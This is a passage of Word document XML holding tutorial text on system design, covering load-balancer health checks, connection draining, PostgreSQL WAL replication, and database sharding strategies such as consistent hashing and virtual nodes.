        <w:t>Load balancers continuously probe backends. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three probe types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08442CF9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Attempt TCP connection. Success = port is open, process is running. Doesn't verify the application is functional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7DF538" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Send an HTTP GET to /health or /ping. Check the response status code (200 = healthy). May also check response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3537FE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom script probe:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Execute an arbitrary check. Can verify database connectivity, check queue depths, validate internal state. Most accurate, most expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1CC29" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Probe parameters that matter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F22646" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interval:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> How often to probe (e.g., every 5 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB31C0E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> How long to wait for a response before declaring the probe failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4809A5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Healthy threshold:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> How many consecutive successes before marking an unhealthy backend as healthy again (prevents flapping — rapidly marking backend up/down).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6E07F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unhealthy threshold:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> How many consecutive failures before marking a healthy backend as unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF5502" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The flapping problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A backend that's slow but not dead may intermittently pass and fail health checks, causing the LB to repeatedly add and remove it from the pool. Each removal causes connection churn; each addition causes a surge of new connections to the backend. The healthy/unhealthy thresholds dampen this oscillation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566D04B8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection Draining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5ADC43" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>When a backend is being removed (scaling down, deployment), you don't want to abruptly terminate in-flight requests. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection draining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC0D2E0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>LB marks the backend as "draining" — stops sending new connections to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66C1BA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Existing connections are allowed to complete normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422DB0E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>After a configurable drain timeout (e.g., 30 seconds), remaining connections are forcibly terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A83CD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="207"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Backend is deregistered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF0F89" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zero-downtime rolling deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — remove one instance from the pool, wait for it to drain, deploy the new version, bring it back, repeat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7363E038" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="3F209A5A">
          <v:rect id="_x0000_i2426" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DC24C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Database Scaling — The Core Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433C47D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Databases are stateful. Stateful systems are the hardest components to scale because you can't simply add instances — you must also manage how data is distributed, replicated, and kept consistent across those instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105B1F3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read Replicas — Replication Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72887624" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical replication (PostgreSQL Streaming Replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78292C20" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The primary database writes all changes to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Ahead Log (WAL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> before applying them to data pages. The WAL is the absolute source of truth — if the server crashes, the WAL is used to replay any changes not yet reflected in data pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8EBAF0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Replicas connect to the primary via streaming replication protocol. The primary has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAL sender process</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> that continuously streams WAL records to each replica's </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAL receiver process</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. The replica's </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>startup process</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> applies WAL records to its data pages, keeping the replica synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A67802" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAL record anatomy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each WAL record contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156B101" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The Log Sequence Number (LSN) — a byte offset in the WAL stream, monotonically increasing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D149C2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The type of operation (heap insert, heap update, index insert, transaction commit, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19075B84" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The affected table, page, and the before/after state of modified tuples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E87BB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>replication lag</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> is the LSN difference between primary and replica, expressed in bytes or converted to approximate time. Monitoring replication lag is critical — if a replica is 10 seconds behind and you route a read to it immediately after a write, you may read stale data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B9F44A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Synchronous vs Asynchronous Replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD8F2E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Asynchronous (default):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Primary sends WAL records to replicas but </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>does not wait for acknowledgment</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> before confirming commits to clients. Maximum write throughput, minimum write latency. Replica lag of milliseconds to seconds under normal conditions. Risk: if primary fails, the in-flight WAL records (not yet applied to replica) are lost → </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data loss</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA9872" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Synchronous:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Primary waits for at least one replica to </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flush the WAL record to disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> before confirming the commit to the client. Zero data loss (any committed transaction is durably on at least two machines). Cost: </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>write latency increases by one network round-trip + replica disk flush time</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (~2–10ms added latency per write). For a system doing thousands of writes per second, this is significant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A474B38" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Quorum commit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Wait for acknowledgment from a majority of replicas. Tolerates individual replica failures without blocking writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D7C49" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read scaling via replicas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Add read replicas, route read queries to them. Linear read throughput scaling with replica count (assuming independent read paths, no cross-replica joins). The limit: replication bandwidth from the primary. All replicas receive all WAL records from the primary. If write volume is very high, the WAL sender becomes a bottleneck. Also, each replica consumes a replication slot on the primary — PostgreSQL has a max_wal_senders limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235C74D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Sharding — Partitioning Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B9316" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Sharding horizontally partitions data across multiple database instances, each owning a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mutually exclusive, collectively exhaustive</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> subset of rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6A316" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Shard Key Decision — The Most Critical Choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579B69A5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The shard key determines how data is distributed. A bad shard key choice causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0030B317" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hotspots:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> One shard receives disproportionate traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67532C28" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uneven distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> One shard stores 80% of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD1DA36" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-shard queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Common queries require touching multiple shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AD567C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Properties of a good shard key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB991B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High cardinality:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Many distinct values → even distribution across shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688D7447" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query alignment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Most queries include the shard key in their WHERE clause → single-shard queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2AEF9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Write distribution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Writes are evenly distributed across shards → no write hotspots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF3E82" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="210"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immutability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The shard key value never changes → no cross-shard row migration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DAF9C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hashing Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C86B7DB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Hash-based sharding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> shard_id = hash(shard_key) % num_shards. Mathematically guarantees even distribution (assuming uniform hash function and high-cardinality key). </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Adding a shard changes N, causing almost all keys to remap to different shards — massive data migration required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074848A5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Consistent hashing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Maps shard keys and shard nodes to a virtual ring (hash space 0 to 2³²). A key is assigned to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first node clockwise</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> from its position on the ring. Adding a node only remaps keys between the new node and its predecessor — approximately 1/N of all keys. Removing a node only remaps that node's keys to its successor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B178D9F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual nodes (vnodes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> With few physical shards, the ring may have uneven coverage — one shard responsible for 40% of the keyspace, another for 10%. Vnodes solve this by mapping each physical shard to </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple positions</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> on the ring (e.g., 256 virtual nodes per physical shard). This dramatically improves distribution. Cassandra uses 256 vnodes per node by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A108FE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range-based sharding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Keys are divided into contiguous ranges (users A–H → shard 1, I–P → shard 2, Q–Z → shard 3). Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>efficient range queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (all users starting with A–H are on shard 1). </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Temporal data (timestamps, auto-increment IDs) creates write hotspots — all new data goes to the "latest" shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2D868" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory-based sharding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A lookup table (stored in a highly available KV store) maps each key to its shard. Fully flexible — you can move individual keys between shards without remapping others. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The directory is a bottleneck (every query hits it to find the shard) and a single point of failure. Requires caching the directory to reduce lookup overhead.</w:t>
      </w:r>
    </w:p>
